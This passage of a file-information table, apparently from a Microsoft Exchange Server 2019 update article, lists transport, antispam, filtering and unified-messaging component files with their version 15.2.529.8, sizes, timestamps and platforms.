11:20| x86 \nMicrosoft.exchange.transport.agent.antispam.common.dll| 15.2.529.8| 138,624| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 15.2.529.8| 21,888| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.transport.agent.controlflow.dll| 15.2.529.8| 40,320| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.transport.agent.faultinjectionagent.dll| 15.2.529.8| 22,904| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.transport.agent.frontendproxyagent.dll| 15.2.529.8| 21,376| 01-Jan-2020| 11:23| x86 \nMicrosoft.exchange.transport.agent.hygiene.dll| 15.2.529.8| 212,344| 01-Jan-2020| 11:23| x86 \nMicrosoft.exchange.transport.agent.interceptoragent.dll| 15.2.529.8| 98,680| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.transport.agent.liveidauth.dll| 15.2.529.8| 22,912| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.transport.agent.malware.dll| 15.2.529.8| 169,344| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.transport.agent.malware.eventlog.dll| 15.2.529.8| 18,304| 01-Jan-2020| 11:19| x64 \nMicrosoft.exchange.transport.agent.phishingdetection.dll| 15.2.529.8| 21,064| 01-Jan-2020| 11:24| x86 \nMicrosoft.exchange.transport.agent.prioritization.dll| 15.2.529.8| 31,824| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 15.2.529.8| 47,176| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.transport.agent.search.dll| 15.2.529.8| 30,072| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.transport.agent.senderid.core.dll| 15.2.529.8| 53,120| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll| 15.2.529.8| 44,928| 01-Jan-2020| 11:23| x86 \nMicrosoft.exchange.transport.agent.systemprobedrop.dll| 15.2.529.8| 18,504| 01-Jan-2020| 11:23| x86 \nMicrosoft.exchange.transport.agent.transportfeatureoverrideagent.dll| 15.2.529.8| 46,456| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 15.2.529.8| 46,664| 01-Jan-2020| 11:23| x86 \nMicrosoft.exchange.transport.cloudmonitor.common.dll| 15.2.529.8| 28,024| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.transport.common.dll| 15.2.529.8| 457,088| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.transport.contracts.dll| 15.2.529.8| 18,504| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.transport.decisionengine.dll| 15.2.529.8| 30,584| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.transport.dll| 15.2.529.8| 4,183,928| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.transport.dsapiclient.dll| 15.2.529.8| 182,144| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.transport.eventlog.dll| 15.2.529.8| 121,728| 01-Jan-2020| 11:21| x64 \nMicrosoft.exchange.transport.extensibility.dll| 15.2.529.8| 404,040| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.transport.extensibilityeventlog.dll| 15.2.529.8| 14,712| 01-Jan-2020| 11:20| x64 \nMicrosoft.exchange.transport.flighting.dll| 15.2.529.8| 90,192| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.transport.logging.dll| 15.2.529.8| 89,160| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.transport.logging.search.dll| 15.2.529.8| 68,472| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.transport.loggingcommon.dll| 15.2.529.8| 63,360| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.transport.monitoring.dll| 15.2.529.8| 430,664| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.transport.net.dll| 15.2.529.8| 122,232| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.transport.protocols.contracts.dll| 15.2.529.8| 17,992| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.transport.protocols.dll| 15.2.529.8| 29,056| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.transport.protocols.httpsubmission.dll| 15.2.529.8| 60,792| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.transport.requestbroker.dll| 15.2.529.8| 50,256| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.transport.scheduler.contracts.dll| 15.2.529.8| 33,144| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.transport.scheduler.dll| 15.2.529.8| 113,016| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.transport.smtpshared.dll| 15.2.529.8| 18,304| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.transport.storage.contracts.dll| 15.2.529.8| 52,088| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.transport.storage.dll| 15.2.529.8| 675,400| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.transport.storage.management.dll| 15.2.529.8| 23,936| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.transport.sync.agents.dll| 15.2.529.8| 17,792| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.transport.sync.common.dll| 15.2.529.8| 487,288| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.transport.sync.common.eventlog.dll| 15.2.529.8| 12,672| 01-Jan-2020| 11:20| x64 \nMicrosoft.exchange.transport.sync.manager.dll| 15.2.529.8| 306,256| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.transport.sync.manager.eventlog.dll| 15.2.529.8| 15,744| 01-Jan-2020| 11:20| x64 \nMicrosoft.exchange.transport.sync.migrationrpc.dll| 15.2.529.8| 46,456| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.transport.sync.worker.dll| 15.2.529.8| 1,044,560| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.transport.sync.worker.eventlog.dll| 15.2.529.8| 15,432| 01-Jan-2020| 11:20| x64 \nMicrosoft.exchange.transportlogsearch.eventlog.dll| 15.2.529.8| 18,808| 01-Jan-2020| 11:19| x64 \nMicrosoft.exchange.transportsyncmanagersvc.exe| 15.2.529.8| 19,024| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.um.troubleshootingtool.shared.dll| 15.2.529.8| 118,856| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.um.umcommon.dll| 15.2.529.8| 924,536| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.um.umcore.dll| 15.2.529.8| 1,466,744| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.um.umvariantconfiguration.dll| 15.2.529.8| 32,640| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.unifiedcontent.dll| 15.2.529.8| 41,848| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.unifiedcontent.exchange.dll| 15.2.529.8| 25,168| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.unifiedpolicyfilesync.eventlog.dll| 15.2.529.8| 15,224| 01-Jan-2020| 11:20| x64 \nMicrosoft.exchange.unifiedpolicyfilesyncservicelet.dll| 15.2.529.8| 83,320| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.unifiedpolicysyncservicelet.dll| 15.2.529.8| 50,040| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.variantconfiguration.antispam.dll| 15.2.529.8| 642,432| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.variantconfiguration.core.dll| 15.2.529.8| 186,232| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.variantconfiguration.dll| 15.2.529.8| 67,456| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.variantconfiguration.eventlog.dll| 15.2.529.8| 12,872| 01-Jan-2020| 11:19| x64 \nMicrosoft.exchange.variantconfiguration.excore.dll| 15.2.529.8| 56,696| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.variantconfiguration.globalsettings.dll| 15.2.529.8| 27,512| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.variantconfiguration.hygiene.dll| 15.2.529.8| 120,912| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.variantconfiguration.protectionservice.dll| 15.2.529.8| 31,608| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.variantconfiguration.threatintel.dll| 15.2.529.8| 57,208| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.webservices.auth.dll| 15.2.529.8| 35,920| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.webservices.dll| 15.2.529.8| 1,054,288| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.webservices.xrm.dll| 15.2.529.8| 68,176| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.wlmservicelet.dll| 15.2.529.8| 23,632| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.wopiclient.dll| 15.2.529.8| 77,392| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.workingset.signalapi.dll| 15.2.529.8| 17,272| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.workingsetabstraction.signalapiabstraction.dll| 15.2.529.8| 29,048| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.workloadmanagement.dll| 15.2.529.8| 505,424| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.workloadmanagement.eventlogs.dll| 15.2.529.8| 14,928| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.workloadmanagement.throttling.configuration.dll| 15.2.529.8| 36,736| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.workloadmanagement.throttling.dll| 15.2.529.8| 66,432| 01-Jan-2020| 11:22| x86 \nMicrosoft.fast.contextlogger.json.dll| 15.2.529.8| 19,536| 01-Jan-2020| 11:22| x86 \nMicrosoft.filtering.dll| 15.2.529.8| 113,224| 01-Jan-2020| 11:21| x86 \nMicrosoft.filtering.exchange.dll| 15.2.529.8| 57,208| 01-Jan-2020| 11:21| x86 \nMicrosoft.filtering.interop.dll| 15.2.529.8| 15,432| 01-Jan-2020| 11:22| x86 \nMicrosoft.forefront.activedirectoryconnector.dll| 15.2.529.8| 47,176| 01-Jan-2020| 11:22| x86 \nMicrosoft.forefront.activedirectoryconnector.eventlog.dll| 15.2.529.8| 15,952| 01-Jan-2020| 11:21| x64 \nMicrosoft.forefront.filtering.common.dll| 15.2.529.8| 23,936| 01-Jan-2020| 11:21| x86 \nMicrosoft.forefront.filtering.diagnostics.dll| 15.2.529.8| 22,608| 01-Jan-2020| 11:20| x86 \nMicrosoft.forefront.filtering.eventpublisher.dll| 15.2.529.8| 34,680| 01-Jan-2020| 11:21| x86 \nMicrosoft.forefront.management.powershell.format.ps1xml| Not applicable| 48,898| 01-Jan-2020| 11:21| Not applicable \nMicrosoft.forefront.management.powershell.types.ps1xml| Not applicable| 16,274| 01-Jan-2020| 11:21| Not applicable \nMicrosoft.forefront.monitoring.activemonitoring.local.components.dll| 15.2.529.8| 1,518,456| 01-Jan-2020| 11:22| x86 \nMicrosoft.forefront.monitoring.activemonitoring.local.components.messages.dll| 15.2.529.8| 13,176| 01-Jan-2020| 11:21| x64 \nMicrosoft.forefront.monitoring.management.outsidein.dll| 15.2.529.8| 33,360| 01-Jan-2020| 11:21| x86 \nMicrosoft.forefront.recoveryactionarbiter.contract.dll| 15.2.529.8| 18,296| 01-Jan-2020| 11:22| x86 \nMicrosoft.forefront.reporting.common.dll| 15.2.529.8| 46,456| 01-Jan-2020| 11:21| x86 \nMicrosoft.forefront.reporting.ondemandquery.dll| 15.2.529.8| 50,560| 01-Jan-2020| 11:21| x86 \nMicrosoft.isam.esent.collections.dll| 15.2.529.8| 72,568| 01-Jan-2020| 11:21| x86 \nMicrosoft.isam.esent.interop.dll| 15.2.529.8| 541,560| 01-Jan-2020| 11:19| x86 \nMicrosoft.managementgui.dll| 15.2.529.8| 133,712| 01-Jan-2020| 11:22| x86 \nMicrosoft.mce.interop.dll| 15.2.529.8| 24,440| 01-Jan-2020| 11:22| x86 \nMicrosoft.office.audit.dll| 15.2.529.8| 125,008| 01-